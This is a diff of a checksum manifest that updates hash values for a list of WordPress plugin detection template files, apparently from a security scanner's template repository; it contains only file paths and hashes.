http/technologies/wordpress/plugins/adminimize.yaml:fe9261de252e3a80da843e6bd6b356825bb37611 -http/technologies/wordpress/plugins/advanced-custom-fields.yaml:44a3c2e8c28b0a7c380fff8b194f80bc0b85209d -http/technologies/wordpress/plugins/akismet.yaml:a7c535fa20e8248b7d4b8c3dcd004f82ce282861 +http/technologies/wordpress/plugins/advanced-custom-fields.yaml:f4ac6890d2473dcfaf7558ea1bbbc05a12228be1 +http/technologies/wordpress/plugins/akismet.yaml:97eb9b9f4e8b921916a950f79d2134bc8bc1a31b http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:cd265a5fec513a57ee120b7713fc294eae0d745b -http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:e2f1f49e2fdfb1a7afcdf39851e892df5445bcc1 -http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:4147669572a756fa71f8386e52115124747b3375 -http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:0e58d08bff14a5bdcf74b0071ab30493843b7897 -http/technologies/wordpress/plugins/amp.yaml:59ccd6bfaedca34352633d519865cb5daf5cb295 -http/technologies/wordpress/plugins/antispam-bee.yaml:83282137b06b9d2725b87a1cc5a252e150a7289c -http/technologies/wordpress/plugins/astra-sites.yaml:16090e25b8fe43606f16c162171f7bfca5904f3e +http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:0da9a23cd18187d71aa15d93f91a47fb823c4af0 +http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:74ab97c440b0cd01b4393d10d6c55b6555cd47c8 +http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:e1b4d915222688cd6167c362ada305ea1fb836fb +http/technologies/wordpress/plugins/amp.yaml:dcbe99091dfa4f849f0e8eeacc903bb134ee3c84 +http/technologies/wordpress/plugins/antispam-bee.yaml:7232d9fe113d3cd34563e8e51ee8c0d21cb0a02c +http/technologies/wordpress/plugins/astra-sites.yaml:bf1d3cacfd76664853a92f305a3945a4573c7b5d http/technologies/wordpress/plugins/astra-widgets.yaml:a03bab29952a3b69ee9f684a36a3ba67ff4b8d09 -http/technologies/wordpress/plugins/autoptimize.yaml:7d1bf01c79ad1ccc3f93ae7ca50dd1dc848a8a50 -http/technologies/wordpress/plugins/backwpup.yaml:37a7481e252cd63ce9470fe090c12238683edc30 -http/technologies/wordpress/plugins/better-search-replace.yaml:f5ba1713c0d0c57feff23cd61f09adff485c1719 -http/technologies/wordpress/plugins/better-wp-security.yaml:b6b6b09969408686afbd99a8f501869efd3d9da7 -http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:9cde38ae78739088c0bd65304fb8d6531ef56533 -http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:34318fb63b04eba5f885e412e63eae18522719c2 -http/technologies/wordpress/plugins/breeze.yaml:e10adf37977d9912d3fbd5ccfd883eb279807d62 -http/technologies/wordpress/plugins/broken-link-checker.yaml:0213894e372f547ebaf10f75363f69db5f9ca1ba -http/technologies/wordpress/plugins/chaty.yaml:62cbf438b45f57052b4e03b5c0df71efdf66a6ff -http/technologies/wordpress/plugins/child-theme-configurator.yaml:5731175c0dfbe3a3df0e3a6e689be856fc69516d -http/technologies/wordpress/plugins/classic-editor.yaml:571df5057165afdd6c854028b0050a93a3a03d52 -http/technologies/wordpress/plugins/classic-widgets.yaml:0b4ade396e68a29fd134770790ea78081ab767a6 -http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:be13071cd6582b3cb210ad89c10fc6e0957bd131 +http/technologies/wordpress/plugins/autoptimize.yaml:2022b022d6aac14e16b2c63991205fd7776d7b53 +http/technologies/wordpress/plugins/backwpup.yaml:c08a26b568e7b18a67ad70353b53d9b673382151 +http/technologies/wordpress/plugins/better-search-replace.yaml:6ee23047ab6ad1f45ac5c5b5bf73963e82108536 +http/technologies/wordpress/plugins/better-wp-security.yaml:51b09a10f8c4ce8d9d6abcd63030a2f0419d91e4 +http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:2ed755e6dfd670b8e82bc45e826e5ee597dcbfc3 +http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:a4546d17e59569acda32f2a13969894e2a52e344 +http/technologies/wordpress/plugins/breeze.yaml:2163dac275826a6559cdc1ac3ae95326916ada43 +http/technologies/wordpress/plugins/broken-link-checker.yaml:8fb7380e76769c43157581cc5e77675654ca640b +http/technologies/wordpress/plugins/chaty.yaml:f122378fd2b85d8388f14fb71d0c0fabca7a9bf8 +http/technologies/wordpress/plugins/child-theme-configurator.yaml:cd805effe0104eb403c9b0d9f77c4f48de3118a6 +http/technologies/wordpress/plugins/classic-editor.yaml:d95a3180abfdead614206b4113ffa74d26224ed9 +http/technologies/wordpress/plugins/classic-widgets.yaml:9de68f2a9b76e41888238f36e5d3c6639ea7d807 +http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:ced77213e30aa52e390722afff58ead2e8d65e5c http/technologies/wordpress/plugins/cloudflare.yaml:77ed711d2f95dbfd368b8018e0859cc792bd92e8 -http/technologies/wordpress/plugins/cmb2.yaml:b1e8cafb11ee15d77391e1a02392af8cccba57f8 -http/technologies/wordpress/plugins/coblocks.yaml:a34822c69420495a9273affddf9194537282a30d -http/technologies/wordpress/plugins/code-snippets.yaml:678b681cd40897764ec166dea99de8478181954c -http/technologies/wordpress/plugins/coming-soon.yaml:0f3ded7600e1fa0bd83eb57744dfd945ba58dd73 -http/technologies/wordpress/plugins/complianz-gdpr.yaml:74b77fc63e2878a7d4f92f3a4b7f55c7e968ef6b -http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:b7d102f65a73bdd3b009e0a7ad81e447d3eaa88d -http/technologies/wordpress/plugins/contact-form-7.yaml:140ba02fcbd12efc5d09525f322fb443d6b2ad57 -http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:ab0ad7bfdd3ea91630c85b581daab66df5554c48 -http/technologies/wordpress/plugins/cookie-law-info.yaml:a7af47d278ad5eb7224c350eb2246c432e3288d3 -http/technologies/wordpress/plugins/cookie-notice.yaml:de50919a6a468a9878240d88e8ddf4f9d52fb176 -http/technologies/wordpress/plugins/copy-delete-posts.yaml:0e850184e814cce643bbf4ad50036499a316ef5b -http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:5d6aa81f5fd085008d3137a640ae215211b4c0c2 -http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:096ba6d050e5a6419cff50741d7f3e5907d9bf75 -http/technologies/wordpress/plugins/custom-css-js.yaml:4459e4d2fcf25c6b65ccf035c24fa8777c48f08c -http/technologies/wordpress/plugins/custom-fonts.yaml:08c475c2849a90c08b82b758cfe5b9aee0cd711d -http/technologies/wordpress/plugins/custom-post-type-ui.yaml:edc7a821b6fe5b015138a01d2ebc3e6513f491f9 -http/technologies/wordpress/plugins/disable-comments.yaml:8c1ccb3aa597c3bf0c16e84bf79a6f136b13fe3c -http/technologies/wordpress/plugins/disable-gutenberg.yaml:c5f1d33397f74e2566cccfe9adf4149eb14b4a11 -http/technologies/wordpress/plugins/duplicate-page.yaml:6f972f4970eef86897f9b7aff1c0c74f6edf5f41 -http/technologies/wordpress/plugins/duplicate-post.yaml:c8b511a66ff43a45ffedd1b88a46d40e53a8005e -http/technologies/wordpress/plugins/duplicator.yaml:f6e89d5511f41ab8fead85b58a61d82176319d44 -http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:13b2156be104efcc96069f119cdc2c858b5aed3a +http/technologies/wordpress/plugins/cmb2.yaml:2597865450d66e10f5f62e44d705e8d69f520f8a +http/technologies/wordpress/plugins/coblocks.yaml:51ebfc0470b7d820e2a21c470053af9b6f826ccc +http/technologies/wordpress/plugins/code-snippets.yaml:8462ae7334b6caecae0a9dc73c2de98a16b71f7d +http/technologies/wordpress/plugins/coming-soon.yaml:99d36a3a1c7c195b91b5a980b5d8e9f66f9162b7 +http/technologies/wordpress/plugins/complianz-gdpr.yaml:7f69cc13f3a9590199bd8d273a026e11be8f54db +http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:4bf4e694f89a21a45dd5fb4f7baf4fada18ec952 +http/technologies/wordpress/plugins/contact-form-7.yaml:b399fae9f59c1d4361d56811a81c3e4b89f460d1 +http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:ef1a59d58af3dc001de053d354aaa87e57fd7613 +http/technologies/wordpress/plugins/cookie-law-info.yaml:524dbe469b9c75d077ea555ecf847478a53dfbff +http/technologies/wordpress/plugins/cookie-notice.yaml:dc5f38150b5cfb5e854a6c427a7ad85599444a24 +http/technologies/wordpress/plugins/copy-delete-posts.yaml:e089dc53fe97b7ace17f5fdf59cc076193884dbc +http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:a07d07cf4f1f00331d0da2e2d1e8acf54012b6bd +http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:9da76b827bc9c21d9693b40446b747771e5609ed +http/technologies/wordpress/plugins/custom-css-js.yaml:feeab2964554748054c33cbc0fa66ca4d813f4f0 +http/technologies/wordpress/plugins/custom-fonts.yaml:e2896f53fdb980cae89c91d7c2d2dc0758a16715 +http/technologies/wordpress/plugins/custom-post-type-ui.yaml:927a9043a4c4e76809bf2b5509711a89b5c78cf7 +http/technologies/wordpress/plugins/disable-comments.yaml:aff8fa7bcc48c733150065413c2ba1cd3fd9072a +http/technologies/wordpress/plugins/disable-gutenberg.yaml:005b2d00eb96c200e7d2d88f83f56734b3a9c74e +http/technologies/wordpress/plugins/duplicate-page.yaml:5777b971597212a5a65e2563be4a368852a88ed2 +http/technologies/wordpress/plugins/duplicate-post.yaml:553c1f0d1728e363e2b986617c35ee575ac446cf +http/technologies/wordpress/plugins/duplicator.yaml:8a3b14dd7e8a24ed53e48050860ec962179c8ede +http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:9e4dfa8503e8d86e7d6094951e508e674813093d http/technologies/wordpress/plugins/easy-fancybox.yaml:91706438bedc39afdeaebdbf43a683bb583c8ec0 http/technologies/wordpress/plugins/easy-google-fonts.yaml:1ac3ed149863a6ce5b4325901c49c6837a4c57ea -http/technologies/wordpress/plugins/easy-table-of-contents.yaml:dc7f8a66d655b230b9f86e7408371b657afec872 -http/technologies/wordpress/plugins/easy-wp-smtp.yaml:7a3c617033da4dea65448ac98079dca7ce9eced7 -http/technologies/wordpress/plugins/elementor.yaml:87e57bed454c1ffa8f1180c092768b884c01fe55 -http/technologies/wordpress/plugins/elementskit-lite.yaml:fd765eb94f1951124b42f0060fdbaf3e41f64f94 -http/technologies/wordpress/plugins/enable-media-replace.yaml:ab31d8de8202f5fe56342e37e2b97b620c04a18d -http/technologies/wordpress/plugins/envato-elements.yaml:1792b1bb18d8e3b75290c49e9481abd752625f7f -http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:e955c0301c4d36e1ed0058ca20df5e90550ff64a -http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:b0b23c965232eedb1605f21ed92cd3647f6f18d4 -http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:0d6fa673ecc67045a97cd1b27b6de09368e069bc -http/technologies/wordpress/plugins/fast-indexing-api.yaml:89229b48edbf5b17553d55e6b39521ac3c61abcb -http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:05492b67a15c0842ad5d7f263974671b9c461f84 -http/technologies/wordpress/plugins/flamingo.yaml:bbad18399f4057fce68a1019cfb0c177f3f66ad4 -http/technologies/wordpress/plugins/fluent-smtp.yaml:f8756f30bfdc614abb6aa0cef6f395e5a96615d8 -http/technologies/wordpress/plugins/fluentform.yaml:41bab87a01e0ce62341a024bd937104f1072b395 -http/technologies/wordpress/plugins/font-awesome.yaml:d61908d165c5e27d05672655e2a21614d82c7df7 -http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:18bdbf5f4ab294b177f0bb0fe1591208b00ba16e -http/technologies/wordpress/plugins/formidable.yaml:fc76ea970f27659d0479ccde36ffea594b78ece7 -http/technologies/wordpress/plugins/forminator.yaml:0d0c8abfd5d9b766e1d1f9ea24639096df336219 -http/technologies/wordpress/plugins/ga-google-analytics.yaml:06ed726b8d2b53d84fb0a0b1a5e7bee8ce776739 -http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:eabba7c66e27662066cddd955ed9548285a0a19b -http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:b80b8b453286fb2052562066564133d1df4d4522 -http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:52e327176ffa0934107760389a7fa6c15d6cd736 -http/technologies/wordpress/plugins/google-listings-and-ads.yaml:422f0b29743abb9c3b4ebbc9ab6c361895c6ffce -http/technologies/wordpress/plugins/google-site-kit.yaml:61300b4bd7867c298807e347709d0f2084201aa6 -http/technologies/wordpress/plugins/google-sitemap-generator.yaml:38b0d8740502247c857db2223f0d1a3bf68881b1 -http/technologies/wordpress/plugins/gtranslate.yaml:f2c1f59a6c40d7979e51aa224166e4fdae6d61d6 -http/technologies/wordpress/plugins/gutenberg.yaml:b87560081e190486ebe86901eabd5efecc742a51 -http/technologies/wordpress/plugins/happy-elementor-addons.yaml:7403aa1e1055a924ed8a53be33eb00c623f83442 +http/technologies/wordpress/plugins/easy-table-of-contents.yaml:fac965ff270534808a0659437e09949e27ff9540 +http/technologies/wordpress/plugins/easy-wp-smtp.yaml:fe8a5d6aa6cd3c168916b399dc37de957bff9906 +http/technologies/wordpress/plugins/elementor.yaml:7a2af05a487f6b82a842f53c6a0ed29f3ac6cece +http/technologies/wordpress/plugins/elementskit-lite.yaml:091b453088f5bacd8cd7b20b7ee12e6600a3a6f7 +http/technologies/wordpress/plugins/enable-media-replace.yaml:0f060669af6b373303fb7c636a64bc8511581ef8 +http/technologies/wordpress/plugins/envato-elements.yaml:c02673320df7b80c5f77d2464f4bba83148caad0 +http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:1ec19b953e5e74985a792c9fe4884bc69c3e6833 +http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:e0affef2e5ba688f6841722c11c52c84d53db488 +http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:b27c15756d36f2be9b43f7a097e23377dba79a33 +http/technologies/wordpress/plugins/fast-indexing-api.yaml:6d2eed5a15209820eaedba6bcbdab2500575cac3 +http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:0cc49dbf25a0a7d9080e1d4825f6cd6acd6e6834 +http/technologies/wordpress/plugins/flamingo.yaml:d9334baf89094f5b07aab0289a1711dae3a87dd6 +http/technologies/wordpress/plugins/fluent-smtp.yaml:8cc7975c9d2c64a5fca8c4f245384f3fa0c7e51b +http/technologies/wordpress/plugins/fluentform.yaml:b5890bf37c83fab6258b99af8dbe845f07ef3acf +http/technologies/wordpress/plugins/font-awesome.yaml:ae1d599487ce1806ae59df8d827f77a64763c952 +http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:1cf136d21c4d9bffa36005acdc27fe93ad994a6b +http/technologies/wordpress/plugins/formidable.yaml:bba5b076cdda6a912fb70882016a7094b1fd8d63 +http/technologies/wordpress/plugins/forminator.yaml:0255e9009fd1ca173c4265da830790e42a139579 +http/technologies/wordpress/plugins/ga-google-analytics.yaml:5985945f2db1d0fc626104992092cfdf16922780 +http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:1af03d5d9ec6b7a6c002d1f6954f5348666a5b66 +http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:01e2e3c0d2caf4f678bb4071f04cc7fb4e4176c9 +http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:bbcc873fde4da39550f39b6395864a60c39758d0 +http/technologies/wordpress/plugins/google-listings-and-ads.yaml:fc138d7b0fb7edec4e0de898b242708b09668a19 +http/technologies/wordpress/plugins/google-site-kit.yaml:bf36db8a215214bd4ddd7601931c6776dacb73a2 +http/technologies/wordpress/plugins/google-sitemap-generator.yaml:b2e49e1c7717e1cef501e0cdf5e0152764924579 +http/technologies/wordpress/plugins/gtranslate.yaml:96a24e8a6e1246b4dff48b1d1345f03b71f94a84 +http/technologies/wordpress/plugins/gutenberg.yaml:1480dd6a8b34b8b48f07f75d0783e8b62658f5e3 +http/technologies/wordpress/plugins/happy-elementor-addons.yaml:a0d824611e9c9edd4b5616e651def0b9b6f31111 http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:1d20308687bcbd54bf13c6f4ed88aa5d5707b8e4 -http/technologies/wordpress/plugins/header-footer-code-manager.yaml:a4d739ab05a15c526bd7196e0c28108397f46798 -http/technologies/wordpress/plugins/header-footer-elementor.yaml:0f4e464758736202d4cd5f630e3d6ae78183e63d -http/technologies/wordpress/plugins/header-footer.yaml:92936c6a47ff4726b0a7b97c7ea5686b5a8798cf -http/technologies/wordpress/plugins/health-check.yaml:fcf0c9e7e685f9de5b96cf415282e7985bce1918 -http/technologies/wordpress/plugins/hello-dolly.yaml:ca7e60c9eba41d32c0aa040cec2124ee6d9ecae5 -http/technologies/wordpress/plugins/host-webfonts-local.yaml:a2d3e90e76e99a6926515627ccfe2ba73c09bbe3 -http/technologies/wordpress/plugins/hostinger.yaml:3d1716bd2f46fb046fc487e581e644b972a5f161 -http/technologies/wordpress/plugins/image-optimization.yaml:aa50d5d2cf10f2040c9992a2c9e0d54468c7773d -http/technologies/wordpress/plugins/imagify.yaml:f085609c741c54a4bf3511d7bae996cc0d4eecff -http/technologies/wordpress/plugins/imsanity.yaml:913e20f768ce7b09c354531f4cf2bbc7db53093b -http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:a36556103402d111ca593a49569521b6bc78a2e5 -http/technologies/wordpress/plugins/instagram-feed.yaml:93fb81f5e22e139fd2c0508740d52e896cf210c1 -http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:a1363e721f2fe4ce39a3b05309da0f7c5addb465 +http/technologies/wordpress/plugins/header-footer-code-manager.yaml:2292a9791ea8ddd78dad38753e4fbed1e1ab4452 +http/technologies/wordpress/plugins/header-footer-elementor.yaml:db30cc1831297491ecfe0a6495859713a8dd73f2 +http/technologies/wordpress/plugins/header-footer.yaml:30cc98a13236032dccf14ae2fe99fe9d56f5e266 +http/technologies/wordpress/plugins/health-check.yaml:434ebac02b38d272862e843d279ade097373b116 +http/technologies/wordpress/plugins/hello-dolly.yaml:3b4b29b74ab3a565bee2e0023f89c6be63ea8193 +http/technologies/wordpress/plugins/host-webfonts-local.yaml:3354d989b1b54c87cb6cac5b6f9a7f4bdded0da8 +http/technologies/wordpress/plugins/hostinger.yaml:2a95180c1efd6b15d71f0b2ca683fb36a75afbfc +http/technologies/wordpress/plugins/image-optimization.yaml:72ee4ac163c015ff70c59440d45ca3f4bc7abd6b +http/technologies/wordpress/plugins/imagify.yaml:c19f36223456d930c2940715f493c68faa699df2 +http/technologies/wordpress/plugins/imsanity.yaml:2b1a069beaa1e036742be2329b2533044948ba30 +http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:5b78c874bc8e513c5e062ce3679f6346e969814d +http/technologies/wordpress/plugins/instagram-feed.yaml:2ae64404253f58a85c83c73c4d812c374ae30a73 +http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:2ed60428095c8a55e130753280d5e9f71df35ac7 http/technologies/wordpress/plugins/iwp-client.yaml:211621e7048b766fb8fc89837327329d606f1e50 -http/technologies/wordpress/plugins/jetpack-boost.yaml:7ada0ba0e1402f61160f703940af568bbdc5a78f -http/technologies/wordpress/plugins/jetpack.yaml:052e8123fe19a4ccbd88d7057b6220fc09bc49e5 -http/technologies/wordpress/plugins/kadence-blocks.yaml:462e77eee6dac513bd70e0d905c0430be341fc9a -http/technologies/wordpress/plugins/kirki.yaml:ee663466849a6e4a36b2e70523857761de9e4edc -http/technologies/wordpress/plugins/leadin.yaml:23f08928d76eb48d37b1fd9bbc17c729d533ebfb -http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:a7f5642dee515d041e6f09dcd42eead3aed66ba7 -http/technologies/wordpress/plugins/limit-login-attempts.yaml:3f9d5d7dc7e5ceee331b6ae8a8a280dd4937064c -http/technologies/wordpress/plugins/litespeed-cache.yaml:5be7ee817bf0054050bfd6590f987f5e6020acb9 -http/technologies/wordpress/plugins/loco-translate.yaml:3566c32068b67384b7867192b410b9af6fd8f958 -http/technologies/wordpress/plugins/loginizer.yaml:df5aaf6c0fc123cdf155860b02497d948055b5ab +http/technologies/wordpress/plugins/jetpack-boost.yaml:069ab1663d472ab9ad8bdb2bf52fba3550dc4e8e +http/technologies/wordpress/plugins/jetpack.yaml:e1101fa99394212f562b374328b038645b03a154 +http/technologies/wordpress/plugins/kadence-blocks.yaml:5938b6f082e8a762c473b0d827c9ef0fe8a319a9 +http/technologies/wordpress/plugins/kirki.yaml:550e62da80eaf424b333b4c23f95c9ca7898a355 +http/technologies/wordpress/plugins/leadin.yaml:3001a916dd806c9cb07802a06c95e50fbb7aab2b +http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:7b1fb09276754ba8d686b704eef584c8b4e20e10 +http/technologies/wordpress/plugins/limit-login-attempts.yaml:ddd75bc52ffdabe776c75e1d9bd93925169ae65b +http/technologies/wordpress/plugins/litespeed-cache.yaml:30a73374ed268826fbee1c3859581fd853ae4f7e +http/technologies/wordpress/plugins/loco-translate.yaml:f0b8efaed83163250447a47ad630f860f5dad491 +http/technologies/wordpress/plugins/loginizer.yaml:fbeb31a5764ee6ac44c38bdccec72b662870213a http/technologies/wordpress/plugins/loginpress.yaml:f3214f698e4519506749dc1c78c6c6f592d55cd7 -http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:772f0c28175630aec6a63eb504d2ea1b74a25dd2 -http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:1c05f90eb50f3a8f072925cd0303e84b199e41ec -http/technologies/wordpress/plugins/mailpoet.yaml:76728bbd00bb646eec55a8a5e6c469a30a718300 -http/technologies/wordpress/plugins/maintenance.yaml:44bd53f11dedde34fbc81dd58604744f1d183223 -http/technologies/wordpress/plugins/mainwp-child.yaml:fbf0ec1689a90f783c8ceb02f7a04382c39309e5 -http/technologies/wordpress/plugins/malcare-security.yaml:5f2ef05bae54a6a05dba95fac2c45753422d9185 -http/technologies/wordpress/plugins/megamenu.yaml:3a3867b2e7000490acec8a1db0f7765ed9fc8fe1 -http/technologies/wordpress/plugins/members.yaml:ba857dc41e1d31243de30015c4d9470d42df8c53 -http/technologies/wordpress/plugins/meta-box.yaml:8c38bd4306888e54dc3391102d10fa72837e1043 -http/technologies/wordpress/plugins/metform.yaml:90f52dbae57fb96e16c98281f8524d0daf351e9e -http/technologies/wordpress/plugins/ml-slider.yaml:7ed06a67a393d9bf9c1354a894fa26bca17fd4a2 -http/technologies/wordpress/plugins/newsletter.yaml:3ee3c651239599cb45dcf220c7409494c9ebe9c3 -http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:0c33021a4eefb6a660c593071371537361dfb84d -http/technologies/wordpress/plugins/nextgen-gallery.yaml:ea5e79cd98b84b48b69a0145227d4ec435ed5392 -http/technologies/wordpress/plugins/ninja-forms.yaml:eaafa820796d0c404ee59dd9efefab26c58c4624 -http/technologies/wordpress/plugins/ocean-extra.yaml:65228be6752d1dc95c05dd0a4c75209b04a41790 -http/technologies/wordpress/plugins/official-facebook-pixel.yaml:42b1aeba39e9d1062b8b35b5d6fc1c9ac92914f0 -http/technologies/wordpress/plugins/one-click-demo-import.yaml:9b10160492a86d235ec330579fdefa5eb92b1a95 -http/technologies/wordpress/plugins/optinmonster.yaml:cb72b324f850b87de1beac0dce1f120bd5e89a47 -http/technologies/wordpress/plugins/otter-blocks.yaml:1d77ec76194db956e207c4671a626de6fb1b20e7 -http/technologies/wordpress/plugins/password-protected.yaml:691f351480bb6cd23aa7afedf5dcde3862b61154 -http/technologies/wordpress/plugins/pdf-embedder.yaml:93ec0b4ddeff00afbd2b34a4e49371ceb2d4c48d +http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:399fcc30d28249a456528c6dfa36476039440b2e +http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:46b871016cf8c5ad9f5f8dd833aadbcb7ca8100d +http/technologies/wordpress/plugins/mailpoet.yaml:be7b41e65360a9961f598a6daa5ba837e4729f28 +http/technologies/wordpress/plugins/maintenance.yaml:974abb7a98c6d3c32cde3c462f45921a8d7f2edf +http/technologies/wordpress/plugins/mainwp-child.yaml:6cd01a7fc929c0a4f3d739b23dba2e93716b3a05 +http/technologies/wordpress/plugins/malcare-security.yaml:2c3f0d45a1c0a657f49a1a8e8d227148f965d703 +http/technologies/wordpress/plugins/megamenu.yaml:bcf9b587464cedd970eb27037c273ebc17686a83 +http/technologies/wordpress/plugins/members.yaml:12eb42e1dca63312db380abe2f48026d7bf572b1 +http/technologies/wordpress/plugins/meta-box.yaml:05f5f6836483af8f1c420ea5a5d8727bbdff53a5 +http/technologies/wordpress/plugins/metform.yaml:5b0fc5fcdf855411ec85cef3074b9e4f758fde88 +http/technologies/wordpress/plugins/ml-slider.yaml:d813bfce1eec882a57d333b19f568863c4f8cf93 +http/technologies/wordpress/plugins/newsletter.yaml:dd0672a72fd00cdb8519d913a999e3eb667971bd +http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:93ee8ccb31d603571ae0f5bb3d5ea62fea249e27 +http/technologies/wordpress/plugins/nextgen-gallery.yaml:50bdfbb8a5660adfee27d193246f16efdf5fb59f +http/technologies/wordpress/plugins/ninja-forms.yaml:b2d6101709be36b8bc1f68a08ffc03ce820e64da +http/technologies/wordpress/plugins/ocean-extra.yaml:7beb2cd2fcf3ad954cf2195b2af65b013379cf7f +http/technologies/wordpress/plugins/official-facebook-pixel.yaml:3e21cded6694cf08b1f7ec4e931113d68e059ee7 +http/technologies/wordpress/plugins/one-click-demo-import.yaml:b66b3777e388e0952ec66499d145c3d6ec27048e +http/technologies/wordpress/plugins/optinmonster.yaml:19c9c2c363d82e810f9236fecdd8939f798a823e +http/technologies/wordpress/plugins/otter-blocks.yaml:ace5248ca160e467910fa039718e58cb494ebee1 +http/technologies/wordpress/plugins/password-protected.yaml:34bd75dff172e20df050909a144c8205bf09487b +http/technologies/wordpress/plugins/pdf-embedder.yaml:1055af6e8fe8b40b01228085cf33f4b357e2e4cf http/technologies/wordpress/plugins/photo-gallery.yaml:37274dfdbd25ec4bcb7a3f79052c88d9df2c023e http/technologies/wordpress/plugins/php-compatibility-checker.yaml:9ae2457c7e9d21bee89ff0283903047bd188b93d -http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:ea3fc197949183230c36a54ec40ce7cec2ce05cb -http/technologies/wordpress/plugins/pixelyoursite.yaml:b5bbf81e5eb650342b3d4c2fca46310ee8801848 -http/technologies/wordpress/plugins/polylang.yaml:366f25da7da9f9f2f6aa349b25c24d9242b86c1a +http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:e9a54f7bae3b0aa53cc365d4059c76407b566d58 +http/technologies/wordpress/plugins/pixelyoursite.yaml:2bd76536c2fad12eb089cbf821a9bace47f7c9c2 +http/technologies/wordpress/plugins/polylang.yaml:247116589f3c0d4704534cc1136147ce61a8f2bc http/technologies/wordpress/plugins/popup-builder.yaml:468087ab250c0b356f499a501d5a948d709c9a05 -http/technologies/wordpress/plugins/popup-maker.yaml:1c4cfb8a42e30c98281bc9a2f5c966d999c2a7d7 -http/technologies/wordpress/plugins/post-smtp.yaml:5146be93263e512b200ab784727f91612d5117f6 -http/technologies/wordpress/plugins/post-types-order.yaml:3691aaa9f183d9feef18ec4b069b169a96871b81 -http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:5eac1e84dd2eb1f27121ee409e9e4c6f69ed588c -http/technologies/wordpress/plugins/pretty-link.yaml:4f1ad7829fcfd53a4951657a3764f5d956eb18c9 -http/technologies/wordpress/plugins/really-simple-captcha.yaml:f76181edda9b3d62e3ea21bd51a4d5e4c450bef6 -http/technologies/wordpress/plugins/really-simple-ssl.yaml:bb7296600fad043c5a5fa3ea8c4d3de597e133bc -http/technologies/wordpress/plugins/redirection.yaml:f2fc65063eeb5b4f425e53c33e752b0acc46e8f1 -http/technologies/wordpress/plugins/redux-framework.yaml:af9b75a984712e6609f6bd94f956e026b9dc307b -http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:c0fa1d1aece59d5d6e8e708f4b2d49e769998dd9 -http/technologies/wordpress/plugins/royal-elementor-addons.yaml:81ee3491d2caa18b8f476cbc4f8bdf6645f98857 -http/technologies/wordpress/plugins/safe-svg.yaml:7593c611e1da50fc587d7a34a6447f494d5cddb8 -http/technologies/wordpress/plugins/seo-by-rank-math.yaml:91918b715b41c561ccd6da01b15c5710ceefd48d -http/technologies/wordpress/plugins/sg-cachepress.yaml:86a47e535c821c5c1af37c73687729982a7e8256 -http/technologies/wordpress/plugins/sg-security.yaml:e833734b1006bc06ee6c86a825b3902ec67fb113 -http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:55d132c332394a78efb0b3130261bf37cc0612d2 -http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:196c39da6c914816c14f11df5fc9106d9439f200 -http/technologies/wordpress/plugins/simple-custom-post-order.yaml:f7959e70ca5912ffccbe8bfb5aaf69f15dea94ad +http/technologies/wordpress/plugins/popup-maker.yaml:783ad4da46742ab924f841a460c8cabd879f7240 +http/technologies/wordpress/plugins/post-smtp.yaml:610369004795280bbcfb9b2a0d9d1ce94d79fd31 +http/technologies/wordpress/plugins/post-types-order.yaml:5b619e0d4ff29b42578e1a9d6ffc9650aa8560b3 +http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:c323c9d79f59659ef8f300b960bbc02ff7674aac 